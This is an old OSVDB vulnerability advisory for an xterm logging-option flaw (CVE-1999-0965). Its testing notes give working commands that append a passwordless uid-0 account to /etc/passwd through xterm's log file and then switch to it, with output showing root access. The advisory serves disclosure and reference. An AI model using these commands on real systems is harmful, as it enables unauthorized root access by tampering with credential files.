Multiple Unix xterm Logging Option Arbitrary File Modification

1993-11-01T00:00:00
ID OSVDB:11266
Type osvdb
Reporter OSVDB
Modified 1993-11-01T00:00:00

Description

Manual Testing Notes

% cat >! /tmp/fofo newroot::0:0:The New Superuser on the block:/:/bin/sh ^D % xterm -l -lf /etc/passwd -e cat /tmp/fofo % su newroot

whoami

root

id

uid=0(root) gid=0(wheel)

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1993_4/0000.html Keyword: HPSBUX9312-002 ISS X-Force ID: 550 CVE-1999-0965 CERT: CA-1993-17